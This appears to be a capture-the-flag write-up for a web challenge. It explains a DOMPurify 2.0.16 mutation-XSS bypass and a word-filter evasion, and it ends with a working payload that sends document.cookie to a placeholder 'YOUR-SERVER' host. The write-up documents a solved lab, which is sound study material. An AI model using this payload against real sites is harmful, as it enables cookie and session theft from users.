Drunken Bathrobe - MXSS - Filter evasion

Vulnerable to MXSS and tries to filter the word **math**, vulnerable code: ```javascript function secureQuery(string) { // let's do this real quick, friends are waiting me at the Drunken Bathrobe const reg = /math/gi; // nobody likes math let res = string.replaceAll(reg, ""); res = DOMPurify.sanitize(res); return res; } ``` It then runs through Dompurify. Inside the Dockerfile: ```bash RUN npm i ejs @fastify/view @fastify/formbody @fastify/static [email protected] jsdom ``` Dompuriy 2.0.16 is vulnerable, change from v2.0.16 -> v2.0.17 https://github.com/cure53/DOMPurify/compare/2.0.16...2.0.17#diff-f44bc3a1bfaa31000b8f4f1359dba82a ``` "title": "Tests against nesting-based mXSS behavior 2/2", "payload": "<math><mtext><table><mglyph><style><math>CLICKME</math>", ``` MXSS Reading, specifically Dompurify - https://portswigger.net/daily-swig/dompurify-mutation-xss-bypass-achieved-through-mathml-namespace-confusion - https://research.securitum.com/mutation-xss-via-mathml-mutation-dompurify-2-0-17-bypass/ Tools to test - https://livedom.lab.xss.academy/ Code for the backend check ```javascript const cookies = [ { name: "flag", value: process.env.FLAG, }, ]; async function checkReport(query) { const browser = await puppeteer.launch(browser_options); try { const page = await browser.newPage(); const urlToVisit = "http://127.0.0.1:1337/search?query=" + query; console.log("URL to visit:", urlToVisit); await page.goto("http://127.0.0.1:1337/"); await page.setCookie(...cookies); await page.goto(urlToVisit, { waitUntil: "networkidle0", timeout: 10000, }); await browser.close(); } catch { await browser.close(); } } ``` Final payload that evades the **math** filter and executes a callback to our server with the flag ```payload-final <maMATHth><mtext><table><mglyph><style><maMATHth><img src=x onerror=document.location='http://YOUR-SERVER/?c='%2bdocument.cookie;></mMATHath> ``` ![[Pasted image 20221211011536.png]] Flag: ```flag hctf{my_n3w_flag-fl4vor3d_c0ck7ail} ``` --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #hackappatoi2022 #xss #mxss #dompurify #web Related: